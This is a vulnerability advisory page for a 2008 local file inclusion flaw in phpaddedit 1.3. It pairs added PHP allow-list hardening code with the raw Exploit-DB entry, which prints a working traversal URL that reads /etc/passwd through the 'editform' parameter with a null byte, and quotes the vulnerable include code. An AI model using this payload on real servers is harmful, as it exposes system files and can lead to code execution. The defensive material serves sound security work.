Vendor: phpaddedit
Author: nuclear
CVSS: 9.3 (HIGH)
Vulnerability Type: Local File Inclusion (LFI)
CWE: 98
Product Name: phpaddedit
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: NO
Related CWE: N/A
CPE: a:phpaddedit:phpaddedit:1.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

phpaddedit-1.3 LFI

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'editform' parameter to the '/addedit-render.php' script. A remote attacker can include a file from a remote server, cause a denial of service, access potentially sensitive information, or execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files.
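As an added example (not code from phpaddedit or from the original advisory), the include logic shown in the raw advisory below rewritten so that 'editform' is matched against an allow-list of known form names and the resolved path is checked before it is handed to include_once(); the form names, the "forms" subdirectory and the PHP 8 target are assumptions.

```php
<?php
// Added hardening example, not code from phpaddedit or the advisory.
// addedit-render.php builds an include path straight from $_GET["editform"],
// so "../" sequences and a trailing null byte let include_once() load an
// arbitrary file. The fix below never uses the raw value as a path: it maps
// it onto a fixed set of known form names and checks the resolved file.

// Assumed list of legitimate form names shipped with the application.
const ALLOWED_FORMS = ['contact', 'guestbook', 'news'];

/**
 * Return the validated form name, or null when the input is not acceptable.
 * Only an exact allow-list match passes; nothing is "cleaned", because
 * stripping "../" is bypassable (e.g. "....//" survives one pass).
 */
function resolveFormName(string $candidate): ?string
{
    // Shape check: short, [a-z0-9_-] only; null bytes, dots and slashes never reach the lookup.
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $candidate)) {
        return null;
    }
    return in_array($candidate, ALLOWED_FORMS, true) ? $candidate : null;
}

/**
 * Build the header/footer include path under $formsDir and verify the
 * canonical path is still inside that directory (catches symlink tricks).
 */
function formIncludePath(string $formsDir, string $formName, string $suffix): ?string
{
    $base = realpath($formsDir);
    $path = realpath($formsDir . DIRECTORY_SEPARATOR . $formName . $suffix);
    if ($base === false || $path === false) {
        return null;
    }
    return str_starts_with($path, $base . DIRECTORY_SEPARATOR) ? $path : null;
}

// Usage in the render script; $formname and $addeditcwd are the advisory's
// variable names, the "forms" subdirectory is an assumption (PHP 8+).
if (empty($formname)) {
    $formname = resolveFormName($_GET['editform'] ?? '');
}
$header = ($formname === null) ? null
    : formIncludePath($addeditcwd . 'forms', $formname, '-header.inc.php');
if ($header === null) {
    http_response_code(400);
    exit('Unknown form');
}
include_once $header;
```

The same two helpers apply to the '-footer.inc.php' include; the fixed 'addedit-create-form.php' include needs no change because no user input reaches its path.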

Exploit-DB raw data:

#phpaddedit-1.3 LFI

#Author: nuclear

#script:http://sourceforge.net/projects/phpaddedit/

#vuln:http://target.com/addedit-render.php?editform=../../../../../../../etc/passwd%00

#vulnerable code:
if (!$formname && $_GET["editform"]) $formname = $_GET["editform"];
...
if ( $error_message || $error || !$_POST["submitval"] ) {
    include_once ($formname."-header.inc.php");
    include_once ($addeditcwd."addedit-create-form.php");
    include_once ($formname."-footer.inc.php");
}

#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r

# milw0rm.com [2008-12-10]